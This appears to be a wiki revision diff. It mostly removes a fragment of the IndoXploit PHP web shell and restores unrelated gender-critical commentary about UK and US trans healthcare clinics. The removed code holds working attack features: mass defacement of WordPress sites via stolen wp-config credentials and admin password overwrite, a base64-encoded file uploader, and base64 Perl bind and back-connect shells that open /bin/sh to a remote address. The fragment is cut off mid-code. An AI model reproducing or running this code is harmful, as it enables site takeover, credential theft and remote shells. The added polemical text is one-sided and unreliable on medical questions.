- Edit Content?: <input type='​radio'​ name='​cek_edit'​ value='​Y'​ checked>​Y<​input type='​radio'​ name='​cek_edit'​ value='​N'>​N<​br>​ +
- <​span>​Jika pilih <​u>​Y</​u>​ masukin script defacemu ( saran yang simple aja ), kalo pilih <​u>​N</​u>​ gausah di isi.</​span><​br>​ +
- <​textarea name='​edit_content'​ placeholder='​contoh script: http://​pastebin.com/​EpP671gK'​ style='​width:​ 450px; height: 150px;'></​textarea><​br>​ +
- <input type='​submit'​ name='​hajar'​ value='​Hajar!'​ style='​width:​ 450px;'><​br>​ +
- </​form>​ +
- <​span>​NB:​ Tools ini work jika dijalankan di dalam folder <​u>​config</​u>​ ( ex: /​home/​user/​public_html/​nama_folder_config )</​span><​br>​ +
- "; +
-+
-} elseif($_GET['​do'​] == '​zoneh'​) { +
- if($_POST['​submit'​]) { +
- $domain = explode("​\r\n",​ $_POST['​url'​]);​ +
- $nick =  $_POST['​nick'​];​ +
- echo "​Defacer Onhold: <a href='​http://​www.zone-h.org/​archive/​notifier=$nick/​published=0'​ target='​_blank'>​http://​www.zone-h.org/​archive/​notifier=$nick/​published=0</​a><​br>";​ +
- echo "​Defacer Archive: <a href='​http://​www.zone-h.org/​archive/​notifier=$nick'​ target='​_blank'>​http://​www.zone-h.org/​archive/​notifier=$nick</​a><​br><​br>";​ +
- function zoneh($url,​$nick) { +
- $ch = curl_init("​http://​www.zone-h.com/​notify/​single"​);​ +
-   curl_setopt($ch,​ CURLOPT_RETURNTRANSFER,​ true); +
-   curl_setopt($ch,​ CURLOPT_POST,​ true); +
-   curl_setopt($ch,​ CURLOPT_POSTFIELDS,​ "​defacer=$nick&​domain1=$url&​hackmode=1&​reason=1&​submit=Send"​);​ +
- return curl_exec($ch);​ +
-   curl_close($ch);​ +
-+
- foreach($domain as $url) { +
- $zoneh = zoneh($url,​$nick);​ +
- if(preg_match("/​color=\"​red\">​OK<​\/​font><​\/​li>/​i",​ $zoneh)) { +
- echo "$url -> <font color=lime>​OK</​font><​br>";​ +
- } else { +
- echo "$url -> <font color=red>​ERROR</​font><​br>";​ +
-+
-+
- } else { +
- echo "<​center><​form method='​post'>​ +
- <​u>​Defacer</​u>:​ <​br>​ +
- <input type='​text'​ name='​nick'​ size='​50'​ value='​IndoXploit'><​br>​ +
- <​u>​Domains</​u>:​ <​br>​ +
- <​textarea style='​width:​ 450px; height: 150px;'​ name='​url'></​textarea><​br>​ +
- <input type='​submit'​ name='​submit'​ value='​Submit'​ style='​width:​ 450px;'>​ +
- </​form>";​ +
-+
- echo "</​center>";​ +
-} elseif($_GET['​do'​] == '​cgi'​) { +
- $cgi_dir = mkdir('​idx_cgi',​ 0755); +
- $file_cgi = "​idx_cgi/​cgi.izo";​ +
- $isi_htcgi = "​AddHandler cgi-script .izo";​ +
- $htcgi = fopen("​.htaccess",​ "​w"​);​ +
- fwrite($htcgi,​ $isi_htcgi);​ +
- fclose($htcgi);​ +
- $cgi_script = getsource("​http://​pastebin.com/​raw/​Lj46KxFT"​);​ +
- $cgi = fopen($file_cgi,​ "​w"​);​ +
- fwrite($cgi,​ $cgi_script);​ +
- fclose($cgi);​ +
- chmod($file_cgi,​ 0755); +
- echo "<​iframe src='​idx_cgi/​cgi.izo'​ width='​100%'​ height='​100%'​ frameborder='​0'​ scrolling='​no'></​iframe>";​ +
-} elseif($_GET['​do'​] == '​fake_root'​) { +
- ob_start();​ +
- $cwd = getcwd(); +
- $ambil_user = explode("/",​ $cwd); +
- $user = $ambil_user[2];​ +
- if($_POST['​reverse'​]) { +
- $site = explode("​\r\n",​ $_POST['​url'​]);​ +
- $file = $_POST['​file'​];​ +
- foreach($site as $url) { +
- $cek = getsource("​$url/​~$user/​$file"​);​ +
- if(preg_match("/​hacked/​i",​ $cek)) { +
- echo "URL: <a href='​$url/​~$user/​$file'​ target='​_blank'>​$url/​~$user/​$file</​a>​ -> <font color=lime>​Fake Root!</​font><​br>";​ +
-+
-+
- } else { +
- echo "<​center><​form method='​post'>​ +
- Filename: <​br><​input type='​text'​ name='​file'​ value='​deface.html'​ size='​50'​ height='​10'><​br>​ +
- User: <​br><​input type='​text'​ value='​$user'​ size='​50'​ height='​10'​ readonly><​br>​ +
- Domain: <​br>​ +
- <​textarea style='​width:​ 450px; height: 250px;'​ name='​url'>";​ +
- reverse($_SERVER['​HTTP_HOST'​]);​ +
- echo "</​textarea><​br>​ +
- <input type='​submit'​ name='​reverse'​ value='​Scan Fake Root!' style='​width:​ 450px;'>​ +
- </​form><​br>​ +
- NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /​home/​user/​public_html.</​center>";​ +
-+
-} elseif($_GET['​do'​] == '​adminer'​) { +
- $full = str_replace($_SERVER['​DOCUMENT_ROOT'​],​ "",​ $dir); +
- function adminer($url,​ $isi) { +
- $fp = fopen($isi, "​w"​);​ +
- $ch = curl_init();​ +
-   curl_setopt($ch,​ CURLOPT_URL,​ $url); +
-   curl_setopt($ch,​ CURLOPT_BINARYTRANSFER,​ true); +
-   curl_setopt($ch,​ CURLOPT_RETURNTRANSFER,​ true); +
-   curl_setopt($ch,​ CURLOPT_SSL_VERIFYPEER,​ false); +
-    ​  ​ curl_setopt($ch,​ CURLOPT_FILE,​ $fp); +
- return curl_exec($ch);​ +
-    ​  ​ curl_close($ch);​ +
- fclose($fp);​ +
- ob_flush();​ +
- flush();​ +
-+
- if(file_exists('​adminer.php'​)) { +
- echo "<​center><​font color=lime><​a href='​$full/​adminer.php'​ target='​_blank'>​->​ adminer login <​-</​a></​font></​center>";​ +
- } else { +
- if(adminer("​https://​www.adminer.org/​static/​download/​4.2.4/​adminer-4.2.4.php","​adminer.php"​)) { +
- echo "<​center><​font color=lime><​a href='​$full/​adminer.php'​ target='​_blank'>​->​ adminer login <​-</​a></​font></​center>";​ +
- } else { +
- echo "<​center><​font color=red>​gagal buat file adminer</​font></​center>";​ +
-+
-+
-} elseif($_GET['​do'​] == '​auto_dwp'​) { +
- if($_POST['​auto_deface_wp'​]) { +
- function anucurl($sites) { +
-    $ch = curl_init($sites);​ +
-        ​  ​ curl_setopt($ch,​ CURLOPT_RETURNTRANSFER,​ 1); +
-        ​  ​ curl_setopt($ch,​ CURLOPT_FOLLOWLOCATION,​ 1); +
-        ​  ​ curl_setopt($ch,​ CURLOPT_USERAGENT,​ "​Mozilla/​5.0 (Windows NT 6.1; rv:32.0) Gecko/​20100101 Firefox/​32.0"​);​ +
-        ​  ​ curl_setopt($ch,​ CURLOPT_CONNECTTIMEOUT,​ 5); +
-        ​  ​ curl_setopt($ch,​ CURLOPT_SSL_VERIFYPEER,​ 0); +
-        ​  ​ curl_setopt($ch,​ CURLOPT_SSL_VERIFYHOST,​ 0); +
-        ​  ​ curl_setopt($ch,​ CURLOPT_COOKIEJAR,'​cookie.txt'​);​ +
-        ​  ​ curl_setopt($ch,​ CURLOPT_COOKIEFILE,'​cookie.txt'​);​ +
-        ​  ​ curl_setopt($ch,​ CURLOPT_COOKIESESSION,​ true); +
- $data = curl_exec($ch);​ +
-   curl_close($ch);​ +
- return $data; +
-+
- function lohgin($cek,​ $web, $userr, $pass, $wp_submit) { +
-    $post = array( +
-                   "​log"​ => "​$userr",​ +
-                   "​pwd"​ => "​$pass",​ +
-                   "​rememberme"​ => "​forever",​ +
-                   "​wp-submit"​ => "​$wp_submit",​ +
-                   "​redirect_to"​ => "​$web",​ +
-                   "​testcookie"​ => "​1",​ +
-                   ); +
- $ch = curl_init($cek);​ +
-   curl_setopt($ch,​ CURLOPT_RETURNTRANSFER,​ 1); +
-   curl_setopt($ch,​ CURLOPT_FOLLOWLOCATION,​ 1); +
-   curl_setopt($ch,​ CURLOPT_USERAGENT,​ "​Mozilla/​5.0 (Windows NT 6.1; rv:32.0) Gecko/​20100101 Firefox/​32.0"​);​ +
-   curl_setopt($ch,​ CURLOPT_SSL_VERIFYPEER,​ 0); +
-   curl_setopt($ch,​ CURLOPT_SSL_VERIFYHOST,​ 0); +
-   curl_setopt($ch,​ CURLOPT_POST,​ 1); +
-   curl_setopt($ch,​ CURLOPT_POSTFIELDS,​ $post); +
-   curl_setopt($ch,​ CURLOPT_COOKIEJAR,'​cookie.txt'​);​ +
-   curl_setopt($ch,​ CURLOPT_COOKIEFILE,'​cookie.txt'​);​ +
-   curl_setopt($ch,​ CURLOPT_COOKIESESSION,​ true); +
- $data = curl_exec($ch);​ +
-   curl_close($ch);​ +
- return $data; +
-+
- $scan = $_POST['​link_config'​];​ +
- $link_config = scandir($scan);​ +
- $script = htmlspecialchars($_POST['​script'​]);​ +
- $user = "​indoxploit";​ +
- $pass = "​indoxploit";​ +
- $passx = md5($pass);​ +
- foreach($link_config as $dir_config) { +
- if(!is_file("​$scan/​$dir_config"​)) continue; +
- $config = file_get_contents("​$scan/​$dir_config"​);​ +
- if(preg_match("/​WordPress/",​ $config)) { +
- $dbhost = ambilkata($config,"​DB_HOST',​ '","'"​);​ +
- $dbuser = ambilkata($config,"​DB_USER',​ '","'"​);​ +
- $dbpass = ambilkata($config,"​DB_PASSWORD',​ '","'"​);​ +
- $dbname = ambilkata($config,"​DB_NAME',​ '","'"​);​ +
- $dbprefix = ambilkata($config,"​table_prefix ​ = '","'"​);​ +
- $prefix = $dbprefix."​users";​ +
- $option = $dbprefix."​options";​ +
- $conn = mysql_connect($dbhost,​$dbuser,​$dbpass);​ +
- $db = mysql_select_db($dbname);​ +
- $q = mysql_query("​SELECT * FROM $prefix ORDER BY id ASC"​);​ +
- $result = mysql_fetch_array($q);​ +
- $id = $result[ID];​ +
- $q2 = mysql_query("​SELECT * FROM $option ORDER BY option_id ASC"​);​ +
- $result2 = mysql_fetch_array($q2);​ +
- $target = $result2[option_value];​ +
- if($target == ''​) {  +
- echo "[-] <font color=red>​error,​ gabisa ambil nama domain nya</​font><​br>";​ +
- } else { +
- echo "[+] $target <​br>";​ +
-+
- $update = mysql_query("​UPDATE $prefix SET user_login='​$user',​user_pass='​$passx'​ WHERE ID='​$id'"​);​ +
- if(!$conn OR !$db OR !$update) { +
- echo "[-] MySQL Error: <font color=red>"​.mysql_error()."</​font><​br><​br>";​ +
- mysql_close($conn);​ +
- } else { +
- $site = "​$target/​wp-login.php";​ +
- $site2 = "​$target/​wp-admin/​theme-install.php?​upload";​ +
- $b1 = anucurl($site2);​ +
- $wp_sub = ambilkata($b1,​ "​id=\"​wp-submit\"​ class=\"​button button-primary button-large\"​ value=\"","​\"​ />"​);​ +
- $b = lohgin($site,​ $site2, $user, $pass, $wp_sub); +
- $anu2 = ambilkata($b,"​name=\"​_wpnonce\"​ value=\"","​\"​ />"​);​ +
- $upload3 = base64_decode("​Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/​Pg=="​);​ +
- $www = "​m.php";​ +
- $fp5 = fopen($www,"​w"​);​ +
- fputs($fp5,​$upload3);​ +
- $post2 = array( +
- "​_wpnonce"​ => "​$anu2",​ +
- "​_wp_http_referer"​ => "/​wp-admin/​theme-install.php?​upload",​ +
- "​themezip"​ => "​@$www",​ +
- "​install-theme-submit"​ => "​Install Now",​ +
- ); +
- $ch = curl_init("​$target/​wp-admin/​update.php?​action=upload-theme"​);​ +
-  ​ curl_setopt($ch,​ CURLOPT_RETURNTRANSFER,​ 1); +
-  ​ curl_setopt($ch,​ CURLOPT_FOLLOWLOCATION,​ 1); +
-  ​ curl_setopt($ch,​ CURLOPT_SSL_VERIFYPEER,​ 0); +
-  ​ curl_setopt($ch,​ CURLOPT_SSL_VERIFYHOST,​ 0); +
-  ​ curl_setopt($ch,​ CURLOPT_POST,​ 1); +
-  ​ curl_setopt($ch,​ CURLOPT_POSTFIELDS,​ $post2); +
-  ​ curl_setopt($ch,​ CURLOPT_COOKIEJAR,'​cookie.txt'​);​ +
-  ​ curl_setopt($ch,​ CURLOPT_COOKIEFILE,'​cookie.txt'​);​ +
-       curl_setopt($ch,​ CURLOPT_COOKIESESSION,​ true); +
- $data3 = curl_exec($ch);​ +
-  ​ curl_close($ch);​ +
- $y = date("​Y"​);​ +
- $m = date("​m"​);​ +
- $namafile = "​id.php";​ +
- $fpi = fopen($namafile,"​w"​);​ +
- fputs($fpi,​$script);​ +
- $ch6 = curl_init("​$target/​wp-content/​uploads/​$y/​$m/​$www"​);​ +
-  ​  ​curl_setopt($ch6,​ CURLOPT_POST,​ true); +
-  ​  ​curl_setopt($ch6,​ CURLOPT_POSTFIELDS,​ array('​file3'​=>"​@$namafile"​));​ +
-  ​  ​curl_setopt($ch6,​ CURLOPT_RETURNTRANSFER,​ 1); +
-  ​  ​curl_setopt($ch6,​ CURLOPT_COOKIEFILE,​ "​cookie.txt"​);​ +
-        ​  ​    ​curl_setopt($ch6,​ CURLOPT_COOKIEJAR,'​cookie.txt'​);​ +
-        ​  ​    ​curl_setopt($ch6,​ CURLOPT_COOKIESESSION,​ true); +
- $postResult = curl_exec($ch6);​ +
-  ​  ​curl_close($ch6);​ +
- $as = "​$target/​k.php";​ +
- $bs = anucurl($as);​ +
- if(preg_match("#​$script#​is",​ $bs)) { +
-                    echo "[+] <font color='​lime'>​berhasil mepes...</​font><​br>";​ +
-                    echo "[+] <a href='​$as'​ target='​_blank'>​$as</​a><​br><​br>";​  +
-                    } else { +
-                    echo "[-] <font color='​red'>​gagal mepes...</​font><​br>";​ +
-                    echo "[!!] coba aja manual: <​br>";​ +
-                    echo "[+] <a href='​$target/​wp-login.php'​ target='​_blank'>​$target/​wp-login.php</​a><​br>";​ +
-                    echo "[+] username: <font color=lime>​$user</​font><​br>";​ +
-                    echo "[+] password: <font color=lime>​$pass</​font><​br><​br>"; ​     +
-                    } +
-            mysql_close($conn);​ +
-+
-+
-+
- } else { +
- echo "<​center><​h1>​WordPress Auto Deface</​h1>​ +
- <form method='​post'>​ +
- <input type='​text'​ name='​link_config'​ size='​50'​ height='​10'​ value='​$dir'><​br>​ +
- <input type='​text'​ name='​script'​ height='​10'​ size='​50'​ placeholder='​Hacked by IndoXploit'​ required><​br>​ +
- <input type='​submit'​ style='​width:​ 450px;'​ name='​auto_deface_wp'​ value='​Hajar!!'>​ +
- </​form>​ +
- <​br><​span>​NB:​ Tools ini work jika dijalankan di dalam folder <​u>​config</​u>​ ( ex: /​home/​user/​public_html/​nama_folder_config )</​span>​ +
- </​center>";​ +
-+
-} elseif($_GET['​do'​] == '​auto_dwp2'​) { +
- if($_POST['​auto_deface_wp'​]) { +
- function anucurl($sites) { +
-    $ch = curl_init($sites);​ +
-        ​  ​ curl_setopt($ch,​ CURLOPT_RETURNTRANSFER,​ 1); +
-        ​  ​ curl_setopt($ch,​ CURLOPT_FOLLOWLOCATION,​ 1); +
-        ​  ​ curl_setopt($ch,​ CURLOPT_USERAGENT,​ "​Mozilla/​5.0 (Windows NT 6.1; rv:32.0) Gecko/​20100101 Firefox/​32.0"​);​ +
-        ​  ​ curl_setopt($ch,​ CURLOPT_CONNECTTIMEOUT,​ 5); +
-        ​  ​ curl_setopt($ch,​ CURLOPT_SSL_VERIFYPEER,​ 0); +
-        ​  ​ curl_setopt($ch,​ CURLOPT_SSL_VERIFYHOST,​ 0); +
-        ​  ​ curl_setopt($ch,​ CURLOPT_COOKIEJAR,'​cookie.txt'​);​ +
-        ​  ​ curl_setopt($ch,​ CURLOPT_COOKIEFILE,'​cookie.txt'​);​ +
-        ​  ​ curl_setopt($ch,​ CURLOPT_COOKIESESSION,​true);​ +
- $data = curl_exec($ch);​ +
-   curl_close($ch);​ +
- return $data; +
-+
- function lohgin($cek,​ $web, $userr, $pass, $wp_submit) { +
-    $post = array( +
-                   "​log"​ => "​$userr",​ +
-                   "​pwd"​ => "​$pass",​ +
-                   "​rememberme"​ => "​forever",​ +
-                   "​wp-submit"​ => "​$wp_submit",​ +
-                   "​redirect_to"​ => "​$web",​ +
-                   "​testcookie"​ => "​1",​ +
-                   ); +
- $ch = curl_init($cek);​ +
-   curl_setopt($ch,​ CURLOPT_RETURNTRANSFER,​ 1); +
-   curl_setopt($ch,​ CURLOPT_FOLLOWLOCATION,​ 1); +
-   curl_setopt($ch,​ CURLOPT_USERAGENT,​ "​Mozilla/​5.0 (Windows NT 6.1; rv:32.0) Gecko/​20100101 Firefox/​32.0"​);​ +
-   curl_setopt($ch,​ CURLOPT_SSL_VERIFYPEER,​ 0); +
-   curl_setopt($ch,​ CURLOPT_SSL_VERIFYHOST,​ 0); +
-   curl_setopt($ch,​ CURLOPT_POST,​ 1); +
-   curl_setopt($ch,​ CURLOPT_POSTFIELDS,​ $post); +
-   curl_setopt($ch,​ CURLOPT_COOKIEJAR,'​cookie.txt'​);​ +
-   curl_setopt($ch,​ CURLOPT_COOKIEFILE,'​cookie.txt'​);​ +
-   curl_setopt($ch,​ CURLOPT_COOKIESESSION,​ true); +
- $data = curl_exec($ch);​ +
-   curl_close($ch);​ +
- return $data; +
-+
- $link = explode("​\r\n",​ $_POST['​link'​]);​ +
- $script = htmlspecialchars($_POST['​script'​]);​ +
- $user = "​indoxploit";​ +
- $pass = "​indoxploit";​ +
- $passx = md5($pass);​ +
- foreach($link as $dir_config) { +
- $config = anucurl($dir_config);​ +
- $dbhost = ambilkata($config,"​DB_HOST',​ '","'"​);​ +
- $dbuser = ambilkata($config,"​DB_USER',​ '","'"​);​ +
- $dbpass = ambilkata($config,"​DB_PASSWORD',​ '","'"​);​ +
- $dbname = ambilkata($config,"​DB_NAME',​ '","'"​);​ +
- $dbprefix = ambilkata($config,"​table_prefix ​ = '","'"​);​ +
- $prefix = $dbprefix."​users";​ +
- $option = $dbprefix."​options";​ +
- $conn = mysql_connect($dbhost,​$dbuser,​$dbpass);​ +
- $db = mysql_select_db($dbname);​ +
- $q = mysql_query("​SELECT * FROM $prefix ORDER BY id ASC"​);​ +
- $result = mysql_fetch_array($q);​ +
- $id = $result[ID];​ +
- $q2 = mysql_query("​SELECT * FROM $option ORDER BY option_id ASC"​);​ +
- $result2 = mysql_fetch_array($q2);​ +
- $target = $result2[option_value];​ +
- if($target == ''​) {  +
- echo "[-] <font color=red>​error,​ gabisa ambil nama domain nya</​font><​br>";​ +
- } else { +
- echo "[+] $target <​br>";​ +
-+
- $update = mysql_query("​UPDATE $prefix SET user_login='​$user',​user_pass='​$passx'​ WHERE ID='​$id'"​);​ +
- if(!$conn OR !$db OR !$update) { +
- echo "[-] MySQL Error: <font color=red>"​.mysql_error()."</​font><​br><​br>";​ +
- mysql_close($conn);​ +
- } else { +
- $site = "​$target/​wp-login.php";​ +
- $site2 = "​$target/​wp-admin/​theme-install.php?​upload";​ +
- $b1 = anucurl($site2);​ +
- $wp_sub = ambilkata($b1,​ "​id=\"​wp-submit\"​ class=\"​button button-primary button-large\"​ value=\"","​\"​ />"​);​ +
- $b = lohgin($site,​ $site2, $user, $pass, $wp_sub); +
- $anu2 = ambilkata($b,"​name=\"​_wpnonce\"​ value=\"","​\"​ />"​);​ +
- $upload3 = base64_decode("​Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/​Pg=="​);​ +
- $www = "​m.php";​ +
- $fp5 = fopen($www,"​w"​);​ +
- fputs($fp5,​$upload3);​ +
- $post2 = array( +
- "​_wpnonce"​ => "​$anu2",​ +
- "​_wp_http_referer"​ => "/​wp-admin/​theme-install.php?​upload",​ +
- "​themezip"​ => "​@$www",​ +
- "​install-theme-submit"​ => "​Install Now",​ +
- ); +
- $ch = curl_init("​$target/​wp-admin/​update.php?​action=upload-theme"​);​ +
-   curl_setopt($ch,​ CURLOPT_RETURNTRANSFER,​ 1); +
-   curl_setopt($ch,​ CURLOPT_FOLLOWLOCATION,​ 1); +
-   curl_setopt($ch,​ CURLOPT_SSL_VERIFYPEER,​ 0); +
-   curl_setopt($ch,​ CURLOPT_SSL_VERIFYHOST,​ 0); +
-   curl_setopt($ch,​ CURLOPT_POST,​ 1); +
-   curl_setopt($ch,​ CURLOPT_POSTFIELDS,​ $post2); +
-   curl_setopt($ch,​ CURLOPT_COOKIEJAR,'​cookie.txt'​);​ +
-   curl_setopt($ch,​ CURLOPT_COOKIEFILE,'​cookie.txt'​);​ +
-       curl_setopt($ch,​ CURLOPT_COOKIESESSION,​ true); +
- $data3 = curl_exec($ch);​ +
-   curl_close($ch);​ +
- $y = date("​Y"​);​ +
- $m = date("​m"​);​ +
- $namafile = "​id.php";​ +
- $fpi = fopen($namafile,"​w"​);​ +
- fputs($fpi,​$script);​ +
- $ch6 = curl_init("​$target/​wp-content/​uploads/​$y/​$m/​$www"​);​ +
-    ​curl_setopt($ch6,​ CURLOPT_POST,​ true); +
-    ​curl_setopt($ch6,​ CURLOPT_POSTFIELDS,​ array('​file3'​=>"​@$namafile"​));​ +
-    ​curl_setopt($ch6,​ CURLOPT_RETURNTRANSFER,​ 1); +
-    ​curl_setopt($ch6,​ CURLOPT_COOKIEFILE,​ "​cookie.txt"​);​ +
-        ​  ​    ​curl_setopt($ch6,​ CURLOPT_COOKIEJAR,'​cookie.txt'​);​ +
-            ​curl_setopt($ch6,​ CURLOPT_COOKIESESSION,​true);​ +
- $postResult = curl_exec($ch6);​ +
-    ​curl_close($ch6);​ +
- $as = "​$target/​k.php";​ +
- $bs = anucurl($as);​ +
- if(preg_match("#​$script#​is",​ $bs)) { +
-                    echo "[+] <font color='​lime'>​berhasil mepes...</​font><​br>";​ +
-                    echo "[+] <a href='​$as'​ target='​_blank'>​$as</​a><​br><​br>";​  +
-                    } else { +
-                    echo "[-] <font color='​red'>​gagal mepes...</​font><​br>";​ +
-                    echo "[!!] coba aja manual: <​br>";​ +
-                    echo "[+] <a href='​$target/​wp-login.php'​ target='​_blank'>​$target/​wp-login.php</​a><​br>";​ +
-                    echo "[+] username: <font color=lime>​$user</​font><​br>";​ +
-                    echo "[+] password: <font color=lime>​$pass</​font><​br><​br>"; ​     +
-                    } +
-            mysql_close($conn);​ +
-+
-+
- } else { +
- echo "<​center><​h1>​WordPress Auto Deface V.2</​h1>​ +
- <form method='​post'>​ +
- Link Config: <​br>​ +
- <​textarea name='​link'​ placeholder='​http://​target.com/​idx_config/​user-config.txt'​ style='​width:​ 450px; height:​250px;'></​textarea><​br>​ +
- <input type='​text'​ name='​script'​ height='​10'​ size='​50'​ placeholder='​Hacked by IndoXploit'​ required><​br>​ +
- <input type='​submit'​ style='​width:​ 450px;'​ name='​auto_deface_wp'​ value='​Hajar!!'>​ +
- </​form></​center>";​ +
-+
-} elseif($_GET['​do'​] == '​network'​) { +
- echo "<​form method='​post'>​ +
- <​u>​Bind Port:</​u>​ <​br>​ +
- PORT: <input type='​text'​ placeholder='​port'​ name='​port_bind'​ value='​6969'>​ +
- <input type='​submit'​ name='​sub_bp'​ value='>>'>​ +
- </​form>​ +
- <form method='​post'>​ +
- <​u>​Back Connect:</​u>​ <​br>​ +
- Server: <input type='​text'​ placeholder='​ip'​ name='​ip_bc'​ value='"​.$_SERVER['​REMOTE_ADDR'​]."'>&​nbsp;&​nbsp;​ +
- PORT: <input type='​text'​ placeholder='​port'​ name='​port_bc'​ value='​6969'>​ +
- <input type='​submit'​ name='​sub_bc'​ value='>>'>​ +
- </​form>";​ +
- $bind_port_p="​IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";​ +
- if(isset($_POST['​sub_bp'​])) { +
- $f_bp = fopen("/​tmp/​bp.pl", "​w"​);​ +
- fwrite($f_bp,​ base64_decode($bind_port_p));​ +
- fclose($f_bp);​+
  
- $port = $_POST['​port_bind'​];​ +http://​www.gendergp.co.uk/​ 
- $out = exe("​perl ​/tmp/bp.pl $port 1>/dev/null 2>&1 &"​);​ + 
- sleep(1); +As a contributor to [[https://www.reddit.com/r/GenderCritical/​comments/​4mp78w/​a_british_gp_is_offering_to_prescribe_hrt_online/​|Reddit/​r/​GenderCritical]] noted  
- echo "<​pre>"​.$out."​\n"​.exe("​ps aux | grep bp.pl")."</​pre>";​ + 
- unlink("/​tmp/​bp.pl"); +''​Instead of ensuring a full physical examination,​ their website makes quite clear how willing they are to prescribe via the internet, with statements like '​Please know that hormones cannot be prescribed without a full assessmentAssessments can be face to face, email, telephone, video-call to suit your needs'. 
- } +And a testimonial from a patient 'after initially seeing my GP, I found my self worrying about how I would have to wait for over a year for my GIC appointment...After a long time looking for faster routes, I began to lose hope and reached the end of my tether but managed to stumble across My Web Doctor*. I sent a email message and was shocked to recieve not only a reply, but actual prescriptions for the medications that I needed'​. 
- $back_connect_p="​IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";​ +I can only assume that this is the 2016 face of evil, obstructive medical gate-keeping. 
- if(isset($_POST['​sub_bc'​])) { +* - the name of her other website, prior to her establishing a dedicated hormone distribution page''​
- $f_bc = fopen("​/tmp/bc.pl""​w"​);​ + 
- fwrite($f_bc,​ base64_decode($bind_connect_p));​ +===== US TransActive Gender Centrer Bypassing Controls ===== 
- fclose($f_bc);​+ 
 +[[https://​4thwavenow.com/​2016/​06/​10/​transactive-doubles-down-on-fast-track-transition-policy-with-clueless-reblog-of-ex-client-who-decries-their-lack-of-gatekeeping/​| 4th Wave Now]] has done some fantastic work tracing how this US clinic will help clients by pass controls. ​ 
 + 
 +[[http://guideonragingstars.tumblr.com/​post/​145647372750/​4-words-2016-a-compilation-of-things-i-wish-my|guideonragingstars]] Some fantastic posters a real antidote to the pastel wimsey of much trans  propaganda 
 + 
 +[[https://​4thwavenow.com/​2016/​06/​12/​jenn-burleton-director-of-youth-transition-org-dismisses-ex-clients-complaints-as-terf-infestation/​]] Further attempts by Trans Active to silence dissent.  
 + 
 +{{tag>​Resources Corruption}}
  
- $ipbc = $_POST['​ip_bc'​];​ 
- $port = $_POST['​port_bc'​];​ 
- $out = exe("​perl /tmp/bc.pl $ipbc $port 1>/​dev/​null 2>&1 &"​);​ 
- sleep(1); 
- echo "<​pre>"​.$out."​\n"​.exe("​ps aux | grep bc.pl"​)."</​pre>";​ 
- unlink("/​tmp/​bc.pl"​);​ 
- } 
-} elseif($_GET['​do'​] == '​krdp_shell'​) { 
- if(strtolower(substr(PHP_OS,​ 0, 3)) === '​win'​) { 
- if($_POST['​create'​]) { 
- $user = htmlspecialchars($_POST['​user'​]);​ 
- $pass = htmlspecialchars($_POST['​pass'​]);​ 
